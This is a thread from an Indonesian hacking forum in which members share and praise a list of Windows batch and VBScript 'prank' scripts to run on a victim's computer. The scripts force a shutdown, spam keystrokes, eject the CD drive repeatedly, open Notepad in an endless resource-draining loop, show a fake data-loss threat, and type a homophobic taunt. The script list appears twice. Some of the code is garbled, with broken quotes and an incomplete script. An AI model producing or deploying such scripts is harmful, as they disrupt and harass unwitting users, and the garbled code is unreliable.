.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Kumpulan Script Jahil

Go down 
+4
artake
Hanzou
zer03s
BumiayuKita
8 posters
PengirimMessage
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeThu Apr 14, 2011 3:59 am

Kali ini kita buat beberapa script yang berfungsi pada OS windows, scriptnya akan berfungsi sesuai dengan fungsinya

Tidak perlu susah ? karna script hanya di muat di notepad, type save nya cukup dengan format .VBS atau .bat

Langsung aja deh ?

1). Memberi pesan dan shutdown komputer :
Code:

@echo off
msg * Aku tidak suka kamu
shutdown -c ?Error! Kamu jelek sekali? -s

Note : save dengan .bat

2). Menyalakan tombol Caps lock secara simultan :
Code:

Set wshShell =wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?{CAPSLOCK}?
loop

Note : save dengan extension .vbs

3). Buka/tutup CD drive secara terus menerus :
Code:

Set oWMP = CreateObject(?WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count ? 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count ? 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Note : save dengan Extexsion .vbs

4). Tekan Enter secara simultan :
Code:

et wshShell = wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?~(enter)?
loop

Note : save dengan ex.vbs

5). Mengetik pesan kita secara otomatis di notepad :
Code:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(?WScript.Shell?)
WshShell.Run ?notepad?
WScript.Sleep 100
WshShell.AppActivate ?Notepad?
WScript.Sleep 500
WshShell.SendKeys ?Hel?
WScript.Sleep 500
WshShell.SendKeys ?lo ?
WScript.Sleep 500
WshShell.SendKeys ?, ho?
WScript.Sleep 500
WshShell.SendKeys ?w a?
WScript.Sleep 500
WshShell.SendKeys ?re ?
WScript.Sleep 500
WshShell.SendKeys ?you?
WScript.Sleep 500
WshShell.SendKeys ?? ?
WScript.Sleep 500
WshShell.SendKeys ?I a?
WScript.Sleep 500
WshShell.SendKeys ?m g?
WScript.Sleep 500
WshShell.SendKeys ?ood?
WScript.Sleep 500
WshShell.SendKeys ? th?
WScript.Sleep 500
WshShell.SendKeys ?ank?
WScript.Sleep 500
WshShell.SendKeys ?s! ?

Note : save dengan Ex.vbs

6). Menjalankan BACKSPACE secara simultan :
Code:

MsgBox ?Let?s go back a few steps?
Set wshShell =wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?{bs}?
loop

Note : save dengan ex.vbs

7). Buka Notepad secara terus menerus :
Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Note : save dengan type .bat

8). Munculin 5 pilihan yang harus korban pilih :
Code:

@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri?
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye?
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Note : save dengan .bat

9). Hack keyboard sehingga korban dipaksa mengetik ? You are a gay? secara simultan :
Code:

Set wshShell = wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?You are a gay?
loop

Note : save dengan ex.vbs
Kembali Ke Atas Go down
http://aljinet.blogspot.com
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeThu Apr 14, 2011 2:59 pm

Lumajang buat nambah koleksi :fxx:
Kembali Ke Atas Go down
http://zer03s.blog.com/
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeThu Apr 14, 2011 6:05 pm

zer03s!!! wrote:
Lumajang buat nambah koleksi :fxx:

maju terus the h@ck!!!ng,,, :mrh :mrh iloveindo :jempol1
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Hanzou
Pro Nubie
Pro Nubie
Hanzou


Jumlah posting : 57
Points : 88
Reputation : 5
Join date : 20.05.11
Age : 34
Lokasi : GorHckEd

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeSun May 22, 2011 12:16 am

mantap dah postnya gan ,,,



Kumpulan Script Jahil 772168924 Kumpulan Script Jahil 772168924 Kumpulan Script Jahil 772168924 Kumpulan Script Jahil 772168924
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeSat Jun 04, 2011 12:23 pm

terimakasih gan,silakan di coba gan :mgaya: :mgaya:
Kembali Ke Atas Go down
http://aljinet.blogspot.com
artake
Moderator
Moderator
artake


Jumlah posting : 246
Points : 294
Reputation : 13
Join date : 02.05.11
Age : 34
Lokasi : C:/L3g.0n

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeMon Jun 13, 2011 8:35 am

mantabbbzzz bang. . .. . Kumpulan Script Jahil 3529815765 Kumpulan Script Jahil 3529815765
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 2:45 am

tanggung sendiri gan Kumpulan Script Jahil 3529815765
Kembali Ke Atas Go down
http://aljinet.blogspot.com
kenta
Mundane Person
Mundane Person
kenta


Jumlah posting : 203
Points : 280
Reputation : 6
Join date : 03.03.11

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 7:36 am

wah makasih gan Kumpulan Script Jahil 772168924
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 9:02 am

sama sama gan,kan agan yang ngajari Kumpulan Script Jahil 3529815765
Kembali Ke Atas Go down
http://aljinet.blogspot.com
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 1:17 pm

chc(tetsuya) wrote:
Kali ini kita buat beberapa script yang berfungsi pada OS windows, scriptnya akan berfungsi sesuai dengan fungsinya

Tidak perlu susah ? karna script hanya di muat di notepad, type save nya cukup dengan format .VBS atau .bat

Langsung aja deh ?

1). Memberi pesan dan shutdown komputer :
Code:

@echo off
msg * Aku tidak suka kamu
shutdown -c ?Error! Kamu jelek sekali? -s

Note : save dengan .bat

2). Menyalakan tombol Caps lock secara simultan :
Code:

Set wshShell =wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?{CAPSLOCK}?
loop

Note : save dengan extension .vbs

3). Buka/tutup CD drive secara terus menerus :
Code:

Set oWMP = CreateObject(?WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count ? 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count ? 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Note : save dengan Extexsion .vbs

4). Tekan Enter secara simultan :
Code:

et wshShell = wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?~(enter)?
loop

Note : save dengan ex.vbs

5). Mengetik pesan kita secara otomatis di notepad :
Code:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(?WScript.Shell?)
WshShell.Run ?notepad?
WScript.Sleep 100
WshShell.AppActivate ?Notepad?
WScript.Sleep 500
WshShell.SendKeys ?Hel?
WScript.Sleep 500
WshShell.SendKeys ?lo ?
WScript.Sleep 500
WshShell.SendKeys ?, ho?
WScript.Sleep 500
WshShell.SendKeys ?w a?
WScript.Sleep 500
WshShell.SendKeys ?re ?
WScript.Sleep 500
WshShell.SendKeys ?you?
WScript.Sleep 500
WshShell.SendKeys ?? ?
WScript.Sleep 500
WshShell.SendKeys ?I a?
WScript.Sleep 500
WshShell.SendKeys ?m g?
WScript.Sleep 500
WshShell.SendKeys ?ood?
WScript.Sleep 500
WshShell.SendKeys ? th?
WScript.Sleep 500
WshShell.SendKeys ?ank?
WScript.Sleep 500
WshShell.SendKeys ?s! ?

Note : save dengan Ex.vbs

6). Menjalankan BACKSPACE secara simultan :
Code:

MsgBox ?Let?s go back a few steps?
Set wshShell =wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?{bs}?
loop

Note : save dengan ex.vbs

7). Buka Notepad secara terus menerus :
Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Note : save dengan type .bat

8). Munculin 5 pilihan yang harus korban pilih :
Code:

@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri?
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye?
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Note : save dengan .bat

9). Hack keyboard sehingga korban dipaksa mengetik ? You are a gay? secara simultan :
Code:

Set wshShell = wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?You are a gay?
loop

Note : save dengan ex.vbs
ijin sedot gan!!!
lumayan jahil di bulan puasa!!! Kumpulan Script Jahil 3402572103
Kembali Ke Atas Go down
http://cyberwild.p.ht/
kid_1412
Pro Nubie
Pro Nubie
kid_1412


Jumlah posting : 68
Points : 73
Reputation : 1
Join date : 07.07.11

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 6:17 pm

tukang usil...owk owk owk Kumpulan Script Jahil 772168924 Kumpulan Script Jahil 772168924 Kumpulan Script Jahil 772168924
Kembali Ke Atas Go down
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 9:52 pm

Fungsi scriptnya bikin w ngakak.....
wkwkkwkwkwkwkwkwwkkk
Kumpulan Script Jahil 772168924
Kembali Ke Atas Go down
http://cyberwild.p.ht/
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeWed Aug 03, 2011 10:03 pm

saderabdan wrote:
Fungsi scriptnya bikin w ngakak.....
wkwkkwkwkwkwkwkwwkkk
Kumpulan Script Jahil 772168924
kenapa gan?? Kumpulan Script Jahil 3402572103
Kembali Ke Atas Go down
http://aljinet.blogspot.com
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeFri Aug 05, 2011 7:52 am

chc(tetsuya) wrote:
saderabdan wrote:
Fungsi scriptnya bikin w ngakak.....
wkwkkwkwkwkwkwkwwkkk
Kumpulan Script Jahil 772168924
kenapa gan?? Kumpulan Script Jahil 3402572103
9). Hack keyboard sehingga korban dipaksa mengetik ? You are a gay? secara simultan :
Code:

Set wshShell = wscript.CreateObject(?WScript.Shell?)
do
wscript.sleep 100
wshshell.sendkeys ?You are a gay?
loop

Note : save dengan ex.vbs

sksksksk fungsinya...
wkwkkwkwkwk Kumpulan Script Jahil 772168924
Kembali Ke Atas Go down
http://cyberwild.p.ht/
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeSat Aug 06, 2011 12:57 am

perbaiki kklo ada yang salah gan Kumpulan Script Jahil 3529815765
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Squerpants
VIP Member
VIP Member
Squerpants


Jumlah posting : 427
Points : 595
Reputation : 28
Join date : 15.01.11
Age : 33
Lokasi : Hidden

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeSat Aug 06, 2011 9:41 am

:kenyang Mantab Buat nambah iLmu yg semakin kenyang...!!!

:belajar: :belajar:
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitimeSat Aug 06, 2011 9:04 pm

:fun1: :sukro: silakan sikat kak :war:
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Sponsored content





Kumpulan Script Jahil Empty
PostSubyek: Re: Kumpulan Script Jahil   Kumpulan Script Jahil Icon_minitime

Kembali Ke Atas Go down
 
Kumpulan Script Jahil
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Kumpulan Script Code Untuk Iseng
» Movie Stream - Full Script - My Official Script
» Kode Jahil Facebook
» Cek Bug Script PHP
» Script Perusak

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Virus,Malware,Trojan,Worm, Dll-
Navigasi: